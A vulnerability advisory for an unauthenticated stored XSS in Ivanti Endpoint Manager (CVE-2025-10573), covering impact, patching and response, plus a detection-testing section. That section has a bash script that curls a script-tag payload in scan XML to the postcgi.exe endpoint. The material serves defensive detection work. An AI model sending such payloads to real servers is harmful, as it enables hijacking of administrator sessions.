CVE-2025-10573: Ivanti EPM Unauthenticated Stored XSS Vulnerability (Patched)

Summary

Ivanti Endpoint Manager (EPM) contains a stored cross-site scripting vulnerability that lets an unauthenticated attacker inject malicious JavaScript into device scan data. When this payload is displayed in the management console web dashboard, it can be used to hijack an administrator’s session. The issue is tracked as CVE-2025-10573 and carries a CVSS score of 9.6.

Investigation

Rapid7 analysed an Ivanti EPM 11.0.6 Core deployment on Windows Server 2022 and found that a crafted POST request to /incomingdata/postcgi.exe with malicious key=value fields causes the JavaScript to be stored and later executed in the admin UI. The insecure behaviour of the CGI binary postcgi.exe, which writes scan files outside the web root, enables this injection path.

Mitigation

Ivanti released a patch on 2025-12-09, and upgrading to Ivanti EPM version 2024 SU4 SR1 removes the vulnerability. Rapid7 will ship an authenticated vulnerability check for Exposure Command, InsightVM, and Nexpose customers to help identify affected installations.

Response

Organizations should immediately deploy the 2024 SU4 SR1 update, restrict unauthenticated access to the /incomingdata API, and monitor web server logs for POST requests targeting postcgi.exe. They should also review administrator sessions for signs of hijacking and rotate any credentials that may have been compromised.

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

• Attack Narrative & Commands:
  An attacker, having discovered that the Ivanti EPM scan endpoint is unauthenticated, crafts a malicious scan payload embedding a <script> tag that displays an alert (representing session hijacking). The attacker uses curl to POST this payload, mimicking a legitimate device scan submission. Because the payload matches the exact string the rule watches for, the SIEM should generate an alert.

• Regression Test Script:

  #!/bin/bash
  # -------------------------------------------------
  # Simulate stored XSS against Ivanti EPM scan API
  # -------------------------------------------------
  
  # Target URL (adjust host as needed)
  TARGET="https://ivanti.example.com/incomingdata/postcgi.exe?prefix=ldscan&suffix=.scn&name=scan"
  
  # Malicious payload – exactly the string the rule expects
  PAYLOAD="<script>alert('Administrator account has been hijacked')</script>"
  
  # Full XML body that Ivanti EPM expects (simplified)
  XML_BODY="<scan><device><id>99999</id><notes>${PAYLOAD}</notes></device></scan>"
  
  # Send the request
  curl -k -X POST "$TARGET" \
    -H "Content-Type: application/xml" \
    -d "$XML_BODY"
  
  echo "Malicious scan submitted."

• Cleanup Commands:
  The scan data persists in the Ivanti EPM database; deletion typically requires an authenticated admin. For testing purposes, the cleanup step is limited to removing the test file from any local log capture.

  #!/bin/bash
  # Simple cleanup: remove temporary curl logs (if any)
  rm -f /tmp/curl_log_*
  echo "Local test artifacts removed."